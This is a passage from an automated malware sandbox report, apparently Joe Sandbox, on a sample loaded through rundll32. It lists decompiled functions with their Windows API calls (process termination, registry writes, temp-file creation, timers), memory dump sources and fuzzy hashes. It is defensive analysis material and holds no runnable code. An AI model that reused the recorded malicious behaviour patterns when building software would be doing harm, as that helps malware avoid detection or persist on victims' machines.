                                          • memset.NTDLL ref: 00B6E8DA
                                          • memset.NTDLL ref: 00B6E8F1
                                          • memset.NTDLL ref: 00B6E908
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: memset$CloseHandle$SwitchThread
                                          • String ID:
                                          • API String ID: 3699883640-0
                                          • Opcode ID: 7cfa4cb4847887dad4afb3d35e5df8b77b82ebf2ab66c56f46810fdc9f1aed79
                                          • Instruction ID: 2c422c84164c9504aacc1948e93bcb802170c4bb7cec53f90bb19275d62d87d3
                                          • Opcode Fuzzy Hash: 7cfa4cb4847887dad4afb3d35e5df8b77b82ebf2ab66c56f46810fdc9f1aed79
                                          • Instruction Fuzzy Hash: 3A118F31941110BAC7217B19AC85D8F3EFDEBD2711B0400B9F61CA72A3EF79898687A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B69097 Relevance: 10.6, APIs: 7, Instructions: 62memorysynchronizationCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00B690C8
                                          • wcstombs.NTDLL ref: 00B690D9
                                            • Part of subcall function 00B60052: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,00B56025,00000000,?,00000000,?,?,?,?,?,?), ref: 00B60064
                                            • Part of subcall function 00B60052: StrChrA.SHLWAPI(?,00000020,?,00000000,00B56025,00000000,?,00000000,?,?,?,?,?,?), ref: 00B60073
                                          • OpenProcess.KERNEL32(00000001,00000000,?,00000000), ref: 00B690FA
                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 00B69109
                                          • CloseHandle.KERNEL32(00000000), ref: 00B69110
                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00B6911F
                                          • WaitForSingleObject.KERNEL32(00000000), ref: 00B6912F
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HeapProcess$AllocateCloseFreeHandleObjectOpenSingleTerminateWaitwcstombs
                                          • String ID:
                                          • API String ID: 417118235-0
                                          • Opcode ID: f417f775c5548583881b560180a287b0659da4c9a56d9ae9b6a4dc5a7d02a9aa
                                          • Instruction ID: 19d267929767ab5c5a6e2a0495dda7fd5cfe554fcee5102ec5fb09cd1fb563b3
                                          • Opcode Fuzzy Hash: f417f775c5548583881b560180a287b0659da4c9a56d9ae9b6a4dc5a7d02a9aa
                                          • Instruction Fuzzy Hash: E5118F31100216FBE7116F55ED4DBAA7BACFF05756F100050FA09A71A1CBB9ADA4DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B599C2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59stringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B666BC: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B666CE
                                            • Part of subcall function 00B666BC: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B666E7
                                            • Part of subcall function 00B666BC: GetCurrentThreadId.KERNEL32 ref: 00B666F4
                                            • Part of subcall function 00B666BC: GetSystemTimeAsFileTime.KERNEL32(00000F00,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B66700
                                            • Part of subcall function 00B666BC: GetTempFileNameA.KERNEL32(00000000,00000000,00000F00,00000000,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B6670E
                                            • Part of subcall function 00B666BC: lstrcpy.KERNEL32(00000000), ref: 00B66730
                                          • lstrcpy.KERNEL32(-000000FC,00000000), ref: 00B599FC
                                          • CreateDirectoryA.KERNEL32(00000000,00000000,?,?,00002365), ref: 00B59A0E
                                          • GetTickCount.KERNEL32 ref: 00B59A19
                                          • GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,?,00002365), ref: 00B59A25
                                          • lstrcpy.KERNEL32(00000000), ref: 00B59A3F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Temp$Filelstrcpy$NamePathTime$CountCreateCurrentDirectorySystemThreadTick
                                          • String ID: \Low
                                          • API String ID: 1629304206-4112222293
                                          • Opcode ID: 8a0f5934aba47b5407ecfdd5d2abd4ee3694791a41bddbe8bcdfd03ae3edd9c8
                                          • Instruction ID: 1209d829096fa8f00ef9f8b2e3fe7324adc68dd9233ccecbfcc4f30ae74d7929
                                          • Opcode Fuzzy Hash: 8a0f5934aba47b5407ecfdd5d2abd4ee3694791a41bddbe8bcdfd03ae3edd9c8
                                          • Instruction Fuzzy Hash: 5B019231201625EBD6116BB59C48FAF7BDCDF45753B0501E9F908D3290CF28DE4586B5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B63672 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • wsprintfA.USER32 ref: 00B63685
                                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,?), ref: 00B63697
                                          • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 00B636C1
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00B636D4
                                          • CloseHandle.KERNEL32(?), ref: 00B636DD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: TimerWaitable$CloseCreateHandleMultipleObjectsWaitwsprintf
                                          • String ID: 0x%08X
                                          • API String ID: 603522830-3182613153
                                          • Opcode ID: 291b8e32d0dc76867f492b0f8db60d5d1b46fe3f67a7d9a033c311b1f2cab236
                                          • Instruction ID: 87ca184e4f94a81d3cea4d432ab30c4bcfb61d1300a3803f871c378ff500ce07
                                          • Opcode Fuzzy Hash: 291b8e32d0dc76867f492b0f8db60d5d1b46fe3f67a7d9a033c311b1f2cab236
                                          • Instruction Fuzzy Hash: CE014871905229BBCB10AB94DC0DDEEBFBCEF05761B004158E52AA21E0EB709681CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B61DFD Relevance: 9.2, APIs: 6, Instructions: 202synchronizationCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • GetLastError.KERNEL32(?,?,?,00001000,?,00B79314,76DDF750), ref: 00B61E7E
                                          • WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00B79314,76DDF750), ref: 00B61F03
                                          • CloseHandle.KERNEL32(00000000,?,00B79314,76DDF750), ref: 00B61F1D
                                          • OpenProcess.KERNEL32(00100000,00000000,00000000,?,?,?,00B79314,76DDF750), ref: 00B61F52
                                            • Part of subcall function 00B6012F: RtlReAllocateHeap.NTDLL(00000000,?,?,00B5171E), ref: 00B6013F
                                          • WaitForSingleObject.KERNEL32(?,00000064,?,00B79314,76DDF750), ref: 00B61FD4
                                          • CloseHandle.KERNEL32(F0FFC983,?,00B79314,76DDF750), ref: 00B61FFB
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateCloseHandleHeapObjectSingleWait$ErrorLastOpenProcess
                                          • String ID:
                                          • API String ID: 3115907006-0
                                          • Opcode ID: 872814bf00dc5b551c8d7b1384ee1ead3804b3fa523f0bcf811c4347e8e164bb
                                          • Instruction ID: 238a7ccd966a7f68c1893af8bcc2cee7e42ee55dc24be065ec2ac997d0dad471
                                          • Opcode Fuzzy Hash: 872814bf00dc5b551c8d7b1384ee1ead3804b3fa523f0bcf811c4347e8e164bb
                                          • Instruction Fuzzy Hash: C0811871D00219EFDB11DF98C884AADBBF5FF08345F198899E915AB251C739ED50CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B59BF3 Relevance: 9.2, APIs: 6, Instructions: 200timestringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • FileTimeToLocalFileTime.KERNEL32(00000000,?), ref: 00B59C55
                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B59C63
                                          • lstrlenW.KERNEL32(00000010), ref: 00B59C73
                                          • lstrlenW.KERNEL32(00000218), ref: 00B59C7F
                                          • FileTimeToLocalFileTime.KERNEL32(00000001,?), ref: 00B59D6C
                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B59D7A
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Time$File$LocalSystemlstrlen$AllocateHeap
                                          • String ID:
                                          • API String ID: 1122361434-0
                                          • Opcode ID: 34ed970a6c92b17fe905a03783ded5b1207767de1cc6d975d4244188bdeb95f2
                                          • Instruction ID: 8865420234f3d2df14c295d979ad1e821fbc28d2aa6b296cabe0e742d81adb69
                                          • Opcode Fuzzy Hash: 34ed970a6c92b17fe905a03783ded5b1207767de1cc6d975d4244188bdeb95f2
                                          • Instruction Fuzzy Hash: 7F71EC7190021AEBCB50DFA9C884EEEB7FDEF08305F1444A6F915E7251E7389A85DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5EC0C Relevance: 9.1, APIs: 6, Instructions: 133registrysynchronizationthreadCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B55A14: lstrlenW.KERNEL32(?,00000000,76D869A0,?,00000250,?,00000000), ref: 00B55A60
                                            • Part of subcall function 00B55A14: lstrlenW.KERNEL32(?,?,00000000), ref: 00B55A6C
                                            • Part of subcall function 00B55A14: memset.NTDLL ref: 00B55AB4
                                            • Part of subcall function 00B55A14: FindFirstFileW.KERNEL32(00000000,00000000), ref: 00B55ACF
                                            • Part of subcall function 00B55A14: lstrlenW.KERNEL32(0000002C), ref: 00B55B07
                                            • Part of subcall function 00B55A14: lstrlenW.KERNEL32(?), ref: 00B55B0F
                                            • Part of subcall function 00B55A14: memset.NTDLL ref: 00B55B32
                                            • Part of subcall function 00B55A14: wcscpy.NTDLL ref: 00B55B44
                                          • WaitForSingleObject.KERNEL32(00000000,?,06149998,?,00000000,00000000,00000001), ref: 00B5ECB6
                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00B5ECF0
                                          • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,00000000,00000004), ref: 00B5ED13
                                          • RegCloseKey.ADVAPI32(?), ref: 00B5ED1C
                                          • WaitForSingleObject.KERNEL32(00000000), ref: 00B5ED80
                                          • RtlExitUserThread.NTDLL(?), ref: 00B5EDB6
                                            • Part of subcall function 00B713BB: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,00000000,?,?,00B6A2F0,00000000,?,?), ref: 00B713D9
                                            • Part of subcall function 00B713BB: GetFileSize.KERNEL32(00000000,00000000,?,?,00B6A2F0,00000000,?,?,?,00000000,-00000007,00B6377E,-00000007,?,00000000), ref: 00B713E9
                                            • Part of subcall function 00B713BB: CloseHandle.KERNEL32(000000FF,?,?,00B6A2F0,00000000,?,?,?,00000000,-00000007,00B6377E,-00000007,?,00000000), ref: 00B7144B
                                            • Part of subcall function 00B53486: CreateFileW.KERNEL32(?,C0000000,0000FDE9,00000000,00000001,00000080,00000000,00000008,00000000,0000FDE9,?), ref: 00B534C6
                                            • Part of subcall function 00B53486: GetLastError.KERNEL32 ref: 00B534D0
                                            • Part of subcall function 00B53486: WaitForSingleObject.KERNEL32(000000C8), ref: 00B534F5
                                            • Part of subcall function 00B53486: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000001,00000080,00000000), ref: 00B53518
                                            • Part of subcall function 00B53486: SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00B53540
                                            • Part of subcall function 00B53486: WriteFile.KERNEL32(?,00001388,?,?,00000000), ref: 00B53555
                                            • Part of subcall function 00B53486: SetEndOfFile.KERNEL32(?), ref: 00B53562
                                            • Part of subcall function 00B53486: CloseHandle.KERNEL32(?), ref: 00B5357A
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$lstrlen$CloseCreateObjectSingleWait$Handlememset$ErrorExitFindFirstLastOpenPointerSizeThreadUserValueWritewcscpy
                                          • String ID:
                                          • API String ID: 90276831-0
                                          • Opcode ID: a066715010f90651dccc70a501e2017efa084695f01bfd87d49845124b2f1d9f
                                          • Instruction ID: 79656f8e48fae4d0e44813f426221d5cb30d4d14e7da050ebe9774e48c0d0821
                                          • Opcode Fuzzy Hash: a066715010f90651dccc70a501e2017efa084695f01bfd87d49845124b2f1d9f
                                          • Instruction Fuzzy Hash: F3511C71A00209BFDB54DB94CC89FAA77F9EB08701F4140E5FA18E72A1DB719E45CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6F984 Relevance: 9.1, APIs: 6, Instructions: 124memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlImageNtHeader.NTDLL(?), ref: 00B6F99D
                                            • Part of subcall function 00B565B6: lstrlenW.KERNEL32(00000000,76DDF560,00000000,?,00000000,?,?,00B55512,00000020), ref: 00B565E2
                                            • Part of subcall function 00B565B6: RtlAllocateHeap.NTDLL(00000000,?), ref: 00B565F4
                                            • Part of subcall function 00B565B6: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00B55512,00000020), ref: 00B56611
                                            • Part of subcall function 00B565B6: lstrlenW.KERNEL32(00000000,?,?,00B55512,00000020), ref: 00B5661D
                                            • Part of subcall function 00B565B6: HeapFree.KERNEL32(00000000,00000000,?,?,00B55512,00000020), ref: 00B56631
                                          • RtlEnterCriticalSection.NTDLL(00000000), ref: 00B6F9D5
                                          • CloseHandle.KERNEL32(?), ref: 00B6F9E3
                                          • HeapFree.KERNEL32(00000000,?,?,00000001,?,?,00001000,?,?,00001000), ref: 00B6FABC
                                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 00B6FACB
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,00001000,?,?,00001000), ref: 00B6FADE
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$Free$CriticalSectionlstrlen$AllocateCloseCreateDirectoryEnterHandleHeaderImageLeave
                                          • String ID:
                                          • API String ID: 1719504581-0
                                          • Opcode ID: 6785ea1442da45fa577640d52785831b38f28c1f63b28fd23087603bca1967e8
                                          • Instruction ID: 0acd39dd050fd04d98c07b0e8600f20e4a49d2056d40aafc5147cceb329cddff
                                          • Opcode Fuzzy Hash: 6785ea1442da45fa577640d52785831b38f28c1f63b28fd23087603bca1967e8
                                          • Instruction Fuzzy Hash: 71417E36600606AFDB11DFA4EC84FAA7BB9EB44700F0140B5E90CA7260DB34DE94DB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6D4B8 Relevance: 9.1, APIs: 6, Instructions: 122threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleA.KERNEL32(00000000,?), ref: 00B6D513
                                          • GetLastError.KERNEL32 ref: 00B6D539
                                          • SetEvent.KERNEL32(00000000), ref: 00B6D54C
                                          • GetModuleHandleA.KERNEL32(00000000), ref: 00B6D595
                                          • memset.NTDLL ref: 00B6D5AA
                                          • RtlExitUserThread.NTDLL(?), ref: 00B6D5DF
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HandleModule$ErrorEventExitLastThreadUsermemset
                                          • String ID:
                                          • API String ID: 3978817377-0
                                          • Opcode ID: 4ed6a89426900aa3669a3c8846a8c727428da885da4c54c6883d454f13c0675c
                                          • Instruction ID: c6a0561a57a610de20db86f5ac09dde067d4a1e33957c620e123879e94e49699
                                          • Opcode Fuzzy Hash: 4ed6a89426900aa3669a3c8846a8c727428da885da4c54c6883d454f13c0675c
                                          • Instruction Fuzzy Hash: A1414E71A00604AFCB219F68DC88CAEBBFCEF9571576445A9F94BD3550DB34AE84CB20
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6F70B Relevance: 9.1, APIs: 6, Instructions: 117COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dd27d89a77a998b54bae6fa8ae96faecbe00c584ce79e8773f0e2e30b64ddd4b
                                          • Instruction ID: 4ff1900b73cbfdb65def296aab1d46146be13397f1815ad41c46ef681fd32add
                                          • Opcode Fuzzy Hash: dd27d89a77a998b54bae6fa8ae96faecbe00c584ce79e8773f0e2e30b64ddd4b
                                          • Instruction Fuzzy Hash: F941D972600712DFD320AF75AC8993B7BE8FB44325B104ABDF66AC7290DB749845CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B524FE Relevance: 9.1, APIs: 6, Instructions: 108stringsynchronizationCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B5ADF8: lstrlen.KERNEL32(?,00000008,-00000007,?,00000000,00B6A2DC,?,00000000,-00000007,00B6377E,-00000007,?,00000000), ref: 00B5AE07
                                            • Part of subcall function 00B5ADF8: mbstowcs.NTDLL ref: 00B5AE23
                                          • lstrlenW.KERNEL32(00000000,?), ref: 00B52551
                                            • Part of subcall function 00B55A14: lstrlenW.KERNEL32(?,00000000,76D869A0,?,00000250,?,00000000), ref: 00B55A60
                                            • Part of subcall function 00B55A14: lstrlenW.KERNEL32(?,?,00000000), ref: 00B55A6C
                                            • Part of subcall function 00B55A14: memset.NTDLL ref: 00B55AB4
                                            • Part of subcall function 00B55A14: FindFirstFileW.KERNEL32(00000000,00000000), ref: 00B55ACF
                                            • Part of subcall function 00B55A14: lstrlenW.KERNEL32(0000002C), ref: 00B55B07
                                            • Part of subcall function 00B55A14: lstrlenW.KERNEL32(?), ref: 00B55B0F
                                            • Part of subcall function 00B55A14: memset.NTDLL ref: 00B55B32
                                            • Part of subcall function 00B55A14: wcscpy.NTDLL ref: 00B55B44
                                          • PathFindFileNameW.SHLWAPI(00000000,00000000,?,?,00000000,00000000,00000000), ref: 00B52572
                                          • lstrlenW.KERNEL32(?), ref: 00B5259E
                                            • Part of subcall function 00B55A14: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 00B55B6A
                                            • Part of subcall function 00B55A14: RtlEnterCriticalSection.NTDLL(?), ref: 00B55BA0
                                            • Part of subcall function 00B55A14: RtlLeaveCriticalSection.NTDLL(?), ref: 00B55BBC
                                            • Part of subcall function 00B55A14: FindNextFileW.KERNEL32(?,00000000), ref: 00B55BD5
                                            • Part of subcall function 00B55A14: WaitForSingleObject.KERNEL32(00000000), ref: 00B55BE7
                                            • Part of subcall function 00B55A14: FindClose.KERNEL32(?), ref: 00B55BFC
                                            • Part of subcall function 00B55A14: FindFirstFileW.KERNEL32(00000000,00000000), ref: 00B55C10
                                            • Part of subcall function 00B55A14: lstrlenW.KERNEL32(0000002C), ref: 00B55C32
                                          • LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 00B525BB
                                          • WaitForSingleObject.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000), ref: 00B525DC
                                          • PathFindFileNameW.SHLWAPI(0000001E), ref: 00B525F1
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrlen$Find$File$NamePath$CriticalFirstObjectSectionSingleWaitmemset$CloseEnterFreeLeaveLocalNextmbstowcswcscpy
                                          • String ID:
                                          • API String ID: 2670873185-0
                                          • Opcode ID: 490037914cbce449b692b9f4209c3b6e2b453c46e270b4d0efd30b5763cb571e
                                          • Instruction ID: 9a9d70a1dc2f86662e708406618d9efbb807c85ceb0d8bf8707b33e39d8fe4e6
                                          • Opcode Fuzzy Hash: 490037914cbce449b692b9f4209c3b6e2b453c46e270b4d0efd30b5763cb571e
                                          • Instruction Fuzzy Hash: 2E3193724052059FC711AF64DC8896FBBEAFF9935AF0109ADF948A3120DB31DD498B62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B59608 Relevance: 9.1, APIs: 6, Instructions: 93memorystringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlen.KERNEL32(00000000,00000104,00B73407,00000000,?,?,00B580C4,?,?,?,00000000), ref: 00B59624
                                          • lstrlen.KERNEL32(?,00000104,00B73407,00000000,?,?,00B580C4,?,?,?), ref: 00B5963A
                                          • lstrlen.KERNEL32(?,00000104,00B73407,00000000,?,?,00B580C4,?,?,?), ref: 00B5964F
                                          • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00B596B4
                                          • _snprintf.NTDLL ref: 00B596DA
                                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000012,00000001,00000000), ref: 00B596F9
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrlen$Heap$AllocateFree_snprintf
                                          • String ID:
                                          • API String ID: 3180502281-0
                                          • Opcode ID: 1fdf471e18771da0c9371e63668455ca26516de5bb3d3d814872de5d5f6352f9
                                          • Instruction ID: 7bb17abea992b1d1ea201826384b6b66c9a831776c586e416b261ff2d606e609
                                          • Opcode Fuzzy Hash: 1fdf471e18771da0c9371e63668455ca26516de5bb3d3d814872de5d5f6352f9
                                          • Instruction Fuzzy Hash: 0831BA72800159FFCF10DFA8DC8499E7BEAFB48352B0184A6FD09A7110CB719D68DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B547FF Relevance: 9.1, APIs: 6, Instructions: 91timememoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 00B54819
                                          • CreateWaitableTimerA.KERNEL32(00B79208,?,?), ref: 00B54836
                                          • GetLastError.KERNEL32(?,?), ref: 00B54847
                                            • Part of subcall function 00B5EEA4: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,?,748FD3B0,76D85520,?,?,?,00B521C2,?), ref: 00B5EEDC
                                            • Part of subcall function 00B5EEA4: RtlAllocateHeap.NTDLL(00000000,?), ref: 00B5EEF0
                                            • Part of subcall function 00B5EEA4: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,00B521C2,?,?,?), ref: 00B5EF0A
                                            • Part of subcall function 00B5EEA4: RegCloseKey.KERNEL32(?,?,?,?,00B521C2,?,?,?), ref: 00B5EF34
                                          • GetSystemTimeAsFileTime.KERNEL32(?,00000000,?,?,?,?), ref: 00B54887
                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 00B548A6
                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?), ref: 00B548BC
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: TimerWaitable$HeapQueryTimeValue$AllocateCloseCreateErrorFileFreeLastOpenSystem
                                          • String ID:
                                          • API String ID: 1835239314-0
                                          • Opcode ID: 67a9ea746e3abd57198b07db57070e8dcb80a954a3e8bd2f9e1683cab82c0201
                                          • Instruction ID: 9641288b4632f03e392ac75dc96d776590f1d96a28b7b81eed4469100c9cb13e
                                          • Opcode Fuzzy Hash: 67a9ea746e3abd57198b07db57070e8dcb80a954a3e8bd2f9e1683cab82c0201
                                          • Instruction Fuzzy Hash: D3314B71900188FFDF21DFA5CC89DAFBBF9EB94756B104495E909A7150D7309A88CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B58C82 Relevance: 9.1, APIs: 6, Instructions: 78memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • StrChrA.SHLWAPI(?,00000020), ref: 00B58C9A
                                          • StrChrA.SHLWAPI(00000001,00000020), ref: 00B58CAB
                                            • Part of subcall function 00B5BF9A: lstrlen.KERNEL32(?,?,00000000,00000000,?,00B5C555,00000000,?,?,00000000,00000001), ref: 00B5BFAC
                                            • Part of subcall function 00B5BF9A: StrChrA.SHLWAPI(?,0000000D,?,00B5C555,00000000,?,?,00000000,00000001), ref: 00B5BFE4
                                          • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00B58CEB
                                          • memcpy.NTDLL(00000000,?,00000007), ref: 00B58D18
                                          • memcpy.NTDLL(00000000,?,?,00000000,?,00000007), ref: 00B58D27
                                          • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,?,00000007), ref: 00B58D39
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: memcpy$AllocateHeaplstrlen
                                          • String ID:
                                          • API String ID: 1819133394-0
                                          • Opcode ID: 919ec65f0c6634afb9e43aa499e648e706113d613ba124949655eeb8c5ab77fb
                                          • Instruction ID: f614067673a6f60a2fcbffbbc6688f8fce056e0cbf2aa53e81eaea5984c81fb0
                                          • Opcode Fuzzy Hash: 919ec65f0c6634afb9e43aa499e648e706113d613ba124949655eeb8c5ab77fb
                                          • Instruction Fuzzy Hash: 9E215E72600209BFDB119B94CC85F9A77ECEF18754F1540A5F908EB2A1DB74EE848BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B52413 Relevance: 9.1, APIs: 6, Instructions: 74memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,00000000,00000000,?,?,?,?), ref: 00B52452
                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00B52463
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,00000000,00000000,?,?,?,?), ref: 00B5247E
                                          • GetLastError.KERNEL32(?,?,?,?), ref: 00B52494
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 00B524A6
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 00B524BB
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$ByteCharFreeMultiWide$AllocateErrorLast
                                          • String ID:
                                          • API String ID: 1822509305-0
                                          • Opcode ID: 099738c4d513893f9850a60342ef5fa700136a6b10b8748c87da44bd65cfe808
                                          • Instruction ID: 29cb69148ebd870af320e600c34db4f1b77647b4284970a863b5fb4adaa830cb
                                          • Opcode Fuzzy Hash: 099738c4d513893f9850a60342ef5fa700136a6b10b8748c87da44bd65cfe808
